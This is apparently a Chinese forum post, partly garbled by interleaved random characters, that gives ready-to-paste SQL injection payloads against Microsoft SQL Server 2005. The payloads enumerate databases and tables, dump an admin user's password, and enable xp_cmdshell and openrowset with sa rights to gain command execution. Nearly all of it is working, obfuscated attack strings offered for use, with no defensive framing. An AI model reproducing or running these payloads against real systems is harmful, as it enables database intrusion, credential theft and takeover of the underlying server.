. r2 x4 ^* d# r1 W6 h _. U+ ~: V6 L9 e3 j# l$ d' d
* Q }4 ]/ g9 C6 A* I3 M- O: i9 z
[Copy to clipboard]CODE:) K5 M& h0 }6 P6 m s* R( @
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
4 H$ D$ k' ?; z" j5 b" z
7 b9 y9 D( ^+ V" Q8 d: P爆表语句,somedb部份是所要列的数据库,红色数字1累加4 s( M5 l2 J" y
9 r- E! n) ?+ |0 |8 [8 A8 ^
6 L+ {+ h. u( H
[Copy to clipboard]CODE:- u0 P' Y9 @7 J) M/ N3 f
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--+ \3 Q- X8 j* Q* I/ M
/ S& G7 u5 s+ W) X爆字段语句,爆表admin里user='icerover'的密码段' `1 \: t6 m5 O+ C
! m+ o/ w- c t, J6 o, w' _9 t
' f% n# z' c) M4 z* z# W* R[Copy to clipboard]CODE:! E8 @) q) U9 n1 M5 f# j
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--) ~7 r: a; _! n7 ~
+ J. k% d4 l- l; s4 T% bmssql2005默认没有开xp_cmdshell的,openrowset也不能用& S J- [, ~, Y
如果是sa权限,可以这样来开启4 b& k h* J1 C2 z, [, e
开启openrowset. o9 S9 a8 ^$ [/ a3 w$ Q- }
& J- z4 \$ X! |
+ b8 g0 V" E; q. A/ H[Copy to clipboard]CODE:
# s2 z! X; O z& H. T/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
$ g/ Z4 j+ `3 S8 \; k# E) z/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--) r# f6 X9 c: @: |% c
) h6 ]7 M4 ]' U# _
开启xp_cmdshell3 F* ?5 X; @. t j' E0 K! Z9 f
) g! J3 \7 t/ K" }" S% s2 c, n4 J* A) K+ W
[Copy to clipboard]CODE:
/ r G$ k) C8 y6 hEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
' l/ q' `. { q+ G8 V( r; @: VEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--6 H# m& v6 C! K4 H, D
9 u& A/ u, S1 i( m
ok,over~~晚安
# M# X* |7 B6 r+ J' [! a |